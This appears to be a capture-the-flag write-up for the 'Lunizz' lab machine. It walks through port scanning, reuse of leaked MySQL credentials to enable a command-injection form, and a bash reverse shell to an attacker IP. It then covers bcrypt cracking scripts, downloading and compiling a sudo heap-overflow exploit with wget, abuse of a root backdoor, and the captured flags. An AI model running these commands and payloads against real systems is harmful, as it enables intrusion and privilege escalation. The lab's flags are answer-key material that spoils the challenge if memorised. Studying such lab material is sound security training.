Lunizz CTF
Scan the machine:
nmap -A -T4 10.10.80.142
There are 4 open ports: 80, 3306, 4444 and 5000.
Decode the message served on port 4444 (the nmap output shows it): it gives two candidate passwords, extremesecurerootpassword and p@ssword.
Try connecting with netcat:
nc 10.10.80.142 4444
It looks like a root shell, but it is not one.
Port 80 is just a normal web page, so brute-force the directories:
gobuster dir -u http://10.10.80.142/ -w /usr/share/wordlists/dirb/common.txt -t 30 -x php,txt
The /hidden directory looks like an upload page and /whatever looks like a command-injection form, but neither works yet.
instructions.txt is more interesting: it holds MySQL credentials, runcheck:CTF_script_cave_changeme.
Connect to the MySQL server:
mysql -u runcheck -p -h 10.10.80.142
(password: CTF_script_cave_changeme)
If the connection fails with an error, wait a minute and retry.
SHOW DATABASES;
use runornot;
SHOW TABLES;
SELECT * FROM runcheck;
The runcheck table holds a single run flag. That must be what gates the command runner in /whatever we found above, so set it to 1:
UPDATE runcheck SET run = 1;
Go back to /whatever: the run level now shows 1 and the command field executes.
Create a reverse shell. Listen on the attacking machine:
nc -vlnp 1234
and submit this in the /whatever command field:
/bin/bash -c "bash -i >& /dev/tcp/10.18.37.45/1234 0>&1"
Cool, we have a foothold.
Upgrade the shell to a proper TTY:
python3 -c "import pty;pty.spawn('/bin/bash')"
export SHELL=/bin/bash;export TERM=xterm-256color
Ctrl+Z
stty raw -echo; fg
ls -la /
There is a folder /proct owned by adam, which looks interesting. It contains a subfolder pass with a Python file inside; the bcrypt hash and the hashing script below come from there.
So crack the bcrypt hash:
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash
This does not work, but not because the hash is salted: every bcrypt hash is salted and john handles that (the salt is the first 29 characters of the hash string). The real reason is in the Python file: the password is not hashed as-is. It is base64-encoded and the resulting bytes object is passed through str(), so the text bcrypt actually sees is b'<base64>' including the b and the quotes. No plain wordlist entry can ever match that, so the transformation has to be reproduced by hand.
Spoiler: the password sits around the middle of rockyou, and bcrypt at cost 12 (the $2b$12$ prefix) is slow, so a full run takes hours. Cut a smaller list first:
sed -n '7288400,7288830p' /usr/share/wordlists/rockyou.txt > list.txt
#!/usr/bin/env python3
# Brute-force the bcrypt hash while reproducing the challenge script's transformation
import bcrypt
import base64

wordlist = []
with open('list.txt', 'rt') as file:
    f = file.readlines()
    wordlist = [x.strip() for x in f]

# Salt (first 29 characters) and full hash taken from the Python file on the box
salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UO'
passwd = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'

for word in wordlist:
    password = word
    bpass = password.encode('utf-8')
    # str() of a bytes object is its repr: this yields "b'...'" with the b and the quotes,
    # exactly what the original script hashes
    passed = str(base64.b64encode(bpass))
    hashAndSalt = bcrypt.hashpw(passed.encode(), salt)
    print('\r', end='')  # return to the start of the line so the next hash overwrites it
    print(f'Hash: {hashAndSalt}', end='')
    if hashAndSalt == passwd:
        print(f'\nFound: {word}')
        break
Spoiler alert: the password is isolsa_tabefX100pre, which lies inside the rockyou range extracted above. Verify it against the hash:
import bcrypt
import base64

salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UO'
passwd = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'
password = 'isolsa_tabefX100pre'
bpass = password.encode('ascii')
# same str(base64.b64encode(...)) wrapping as the challenge script
passed = str(base64.b64encode(bpass))
hashAndSalt = bcrypt.hashpw(passed.encode(), salt)
if hashAndSalt == passwd:
    print("Match: ", password)
OK. Let's say we use our Python script and run through rockyou; how long would that take?
Honestly I don't know, but it would be a long time, many hours. I don't know how it got past testing.
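The cleaner fix for the john failure is to mangle the wordlist the same way the challenge script mangles candidates, and then let john's bcrypt mode (or bcrypt itself) do the hashing. The script below is an added example, not the challenge's own code: the hash, the salt and the str(base64.b64encode(...)) wrapping are taken from the page, while the helper names (mangle, write_mangled_wordlist, crack, crack_bcrypt, demo_without_bcrypt) and the sha256 stand-in used in the offline demo are this example's own. crack() takes the hash function as a parameter so the search logic runs without the bcrypt package; crack_bcrypt() is the real run.

```python
#!/usr/bin/env python3
"""Reproduce the CTF script's candidate transformation so a normal cracker can be used.

Added example, not the challenge's own code. Only the hash/salt and the
str(base64.b64encode(...)) wrapping come from the write-up; everything else is assumed.
"""
import base64
import hashlib
import hmac
from typing import Callable, Iterable, Optional

# Hash taken from the page; a bcrypt salt is the first 29 characters of the hash string.
TARGET = b"$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6"
SALT = TARGET[:29]


def mangle(word: str) -> bytes:
    """Return the exact bytes the CTF script feeds to bcrypt.hashpw().

    str() of a bytes object is its repr, so the text that gets hashed is "b'<base64>'"
    including the leading b and both quotes, not the word and not even the bare base64.
    """
    return str(base64.b64encode(word.encode("utf-8"))).encode("ascii")


def write_mangled_wordlist(words: Iterable[str], path: str) -> int:
    """Write mangled candidates so `john --format=bcrypt --wordlist=<path> hash` can
    crack the real hash without any custom code; returns the number of lines written."""
    n = 0
    with open(path, "w", encoding="ascii") as fh:
        for w in words:
            fh.write(mangle(w).decode("ascii") + "\n")
            n += 1
    return n


def crack(target: bytes, words: Iterable[str],
          hashpw: Callable[[bytes], bytes]) -> Optional[str]:
    """Run every word through mangle() and hashpw(); return the first match or None.

    hashpw is injected so the logic can be exercised without the bcrypt module; with
    bcrypt installed use `lambda b: bcrypt.hashpw(b, SALT)` (see crack_bcrypt).
    """
    for w in words:
        if hmac.compare_digest(hashpw(mangle(w)), target):
            return w
    return None


def crack_bcrypt(words: Iterable[str], target: bytes = TARGET) -> Optional[str]:
    """Real run against the page's hash. Needs the bcrypt package; at cost 12 (2^12
    rounds) each candidate costs roughly a quarter of a second on commodity hardware,
    which is why narrowing the wordlist matters so much."""
    import bcrypt  # imported lazily so the rest of the file works without it

    def hashpw(candidate: bytes) -> bytes:
        return bcrypt.hashpw(candidate, target[:29])

    return crack(target, words, hashpw)


def demo_without_bcrypt() -> Optional[str]:
    """Constructed demo: a tiny wordlist and a sha256 stand-in for bcrypt, so the
    mangle-then-compare logic runs offline (the wordlist and target are made up here)."""
    wordlist = ["password", "northernlights", "isolsa_tabefX100pre", "p@ssword"]

    def fake_hashpw(candidate: bytes) -> bytes:
        return hashlib.sha256(candidate).digest()

    fake_target = fake_hashpw(mangle("isolsa_tabefX100pre"))
    return crack(fake_target, wordlist, fake_hashpw)


if __name__ == "__main__":
    print(mangle("isolsa_tabefX100pre"))
    print(demo_without_bcrypt())
```

Usage against the box: write_mangled_wordlist(open('list.txt').read().split('\n'), 'mangled.txt') and then point john at mangled.txt with --format=bcrypt, or call crack_bcrypt(...) directly if the bcrypt package is available.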
But there is another approach: CVE-2021-3156, the sudo heap overflow.
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
python3 -m http.server
On the target machine:
cd /tmp
wget http://10.18.37.45:8000/exploit.c
wget http://10.18.37.45:8000/shellcode.c
wget http://10.18.37.45:8000/Makefile
make
./exploit 0
It may not work; I had a bad experience with it in this lab.
After logging in as adam with the cracked password, look in his Desktop: there is a hidden .archive folder.
cat /home/adam/Desktop/.archive/to_my_best_friend_adam.txt
It describes a Google Maps location. That place name, lowercased with the spaces removed, is mason's password: northernlights. Log in as mason.
Flag (user.txt): thm{23cd53cbb37a37a74d4425b703d91883}
Check the listening services:
netstat -a
Something is listening on http://127.0.0.1:8080, running as root.
curl http://127.0.0.1:8080/
It is mason's backdoor: it takes a password and a cmdtype parameter via POST.
curl http://127.0.0.1:8080/ -X POST -d "password=northernlights&cmdtype=lsla"
The passwd command type sets root's password to the password supplied, so reset it and switch user:
curl http://127.0.0.1:8080/ -X POST -d "password=northernlights&cmdtype=passwd"
su root
northernlights
cat /root/r00t.txt
Flag (r00t.txt): thm{ad23b9c63602960371b50c7a697265db}